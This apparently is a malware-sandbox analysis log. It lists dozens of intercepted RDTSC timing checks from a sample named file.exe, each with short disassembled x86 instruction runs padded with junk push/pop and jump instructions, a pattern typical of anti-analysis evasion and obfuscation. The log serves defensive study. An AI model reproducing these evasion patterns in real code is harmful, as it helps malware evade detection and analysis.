Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6307B7 second address: 6307C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633E4C second address: 633EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jbe 00007F6E64DC24B6h 0x0000000d pop edi 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F6E64DC24B8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov di, 6D90h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F6E64DC24B8h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1B37h], edi 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D5826h], ecx 0x00000058 push eax 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633EB4 second address: 633EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633EB8 second address: 633EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 634F90 second address: 634F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 634F94 second address: 634F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 634F9A second address: 63500A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F6E644F7537h 0x0000000f nop 0x00000010 xor edi, dword ptr [ebp+122D2C1Dh] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 mov di, BE5Bh 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F6E644F7528h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a call 00007F6E644F752Ch 0x0000003f mov ebx, 5BF8D370h 0x00000044 pop edi 0x00000045 mov bx, cx 0x00000048 push eax 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jng 00007F6E644F7526h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 636231 second address: 63623F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6E64DC24BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63A24E second address: 63A254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63A254 second address: 63A258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B324 second address: 63B329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B329 second address: 63B344 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E64DC24BCh 0x00000008 jns 00007F6E64DC24B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F6E64DC24B8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B344 second address: 63B349 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63B3D1 second address: 63B3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E386 second address: 63E38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E38A second address: 63E390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638210 second address: 638216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E5B2 second address: 63E5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648A4F second address: 648A65 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6E644F7526h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F6E644F7526h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648A65 second address: 648A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0CB3 second address: 5E0CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0CB9 second address: 5E0CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F6E64DC24CEh 0x0000000b jmp 00007F6E64DC24C8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648175 second address: 648179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6482D4 second address: 6482E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F6E64DC24B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648447 second address: 648451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648594 second address: 6485BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24C6h 0x00000009 jnl 00007F6E64DC24B6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F6E64DC24B6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7B7 second address: 5EC7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Dh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7CC second address: 5EC7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7D1 second address: 5EC7FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7533h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E644F7536h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7FE second address: 5EC802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92E0 second address: 5E92E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92E4 second address: 5E92E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92E9 second address: 5E92EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92EF second address: 5E92F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653A8C second address: 653A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 ja 00007F6E644F7526h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653A99 second address: 653AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F6E64DC24B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653AA6 second address: 653AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653AAA second address: 653ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6E64DC24C7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653ACD second address: 653AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7532h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653AE5 second address: 653AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653DF1 second address: 653E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6E644F7530h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 653E0C second address: 653E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654211 second address: 654242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7536h 0x00000009 jmp 00007F6E644F7536h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654242 second address: 654268 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E64DC24C7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F6E64DC24B6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658AA9 second address: 658AB7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658AB7 second address: 658AC1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E64DC24B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658AC1 second address: 658AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658D9D second address: 658DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658ED0 second address: 658EDA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 659314 second address: 65931A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65931A second address: 65931E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65931E second address: 659350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F6E64DC24B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6E64DC24BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E64DC24C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6594EB second address: 6594F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F6E644F7526h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6597C2 second address: 6597C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664C00 second address: 664C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6E644F7526h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664C0F second address: 664C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664C13 second address: 664C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C7A1 second address: 62C7B3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C7B3 second address: 62C7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C7B7 second address: 62C7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C7BD second address: 62C7C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CA02 second address: 62CA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CB7F second address: 62CB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CB83 second address: 62CBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F6E64DC24BDh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CBA1 second address: 62CBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CBA5 second address: 62CBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6E64DC24C6h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CBCD second address: 62CBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CBD1 second address: 62CC5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F6E64DC24C0h 0x00000010 pop eax 0x00000011 adc ecx, 771EB81Eh 0x00000017 mov edx, dword ptr [ebp+122D2C25h] 0x0000001d call 00007F6E64DC24B9h 0x00000022 pushad 0x00000023 jp 00007F6E64DC24BCh 0x00000029 jns 00007F6E64DC24BCh 0x0000002f popad 0x00000030 push eax 0x00000031 pushad 0x00000032 push ecx 0x00000033 jo 00007F6E64DC24B6h 0x00000039 pop ecx 0x0000003a jg 00007F6E64DC24B8h 0x00000040 popad 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 jmp 00007F6E64DC24C0h 0x0000004a mov eax, dword ptr [eax] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F6E64DC24C4h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CC5D second address: 62CC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CC63 second address: 62CC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jl 00007F6E64DC24B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CC89 second address: 62CC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CC92 second address: 62CC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CE72 second address: 62CEB3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 jbe 00007F6E644F7526h 0x00000018 jmp 00007F6E644F752Bh 0x0000001d popad 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 xor edx, dword ptr [ebp+122D2470h] 0x00000026 nop 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007F6E644F7530h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D933 second address: 62D939 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D939 second address: 62D977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F6E644F7531h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov edx, ebx 0x00000010 lea eax, dword ptr [ebp+1248C2BDh] 0x00000016 mov edi, dword ptr [ebp+124500DAh] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6E644F7533h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E434A second address: 5E434E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663E0B second address: 663E16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6640C8 second address: 6640CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6640CF second address: 6640EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6E644F7526h 0x0000000a jmp 00007F6E644F7532h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6640EB second address: 6640EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664365 second address: 66436F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6644DE second address: 6644E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6644E4 second address: 6644EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6647C5 second address: 6647D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6647D4 second address: 6647DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669DF7 second address: 669E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669E14 second address: 669E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669F4C second address: 669F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66A1F3 second address: 66A210 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6E644F7533h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66A210 second address: 66A217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66A217 second address: 66A234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F6E644F7531h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66A234 second address: 66A260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 jnp 00007F6E64DC24B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F6E64DC24BFh 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AA64 second address: 66AA78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6E644F752Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AA78 second address: 66AA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AA81 second address: 66AA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66ABD2 second address: 66ABD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E650 second address: 66E656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E656 second address: 66E65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
